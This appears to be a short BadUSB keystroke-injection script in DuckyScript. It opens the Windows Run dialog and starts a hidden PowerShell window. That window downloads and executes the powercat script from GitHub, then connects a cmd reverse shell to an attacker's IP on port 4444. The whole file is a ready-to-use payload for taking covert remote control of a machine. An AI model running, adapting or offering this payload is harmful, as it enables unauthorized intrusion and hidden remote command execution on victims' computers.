GUI r
DELAY 500
STRING PowerShell.exe -WindowStyle Hidden -Command "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1') ;powercat -c <your machine ip> -p 4444 -e cmd"
ENTER
ENTER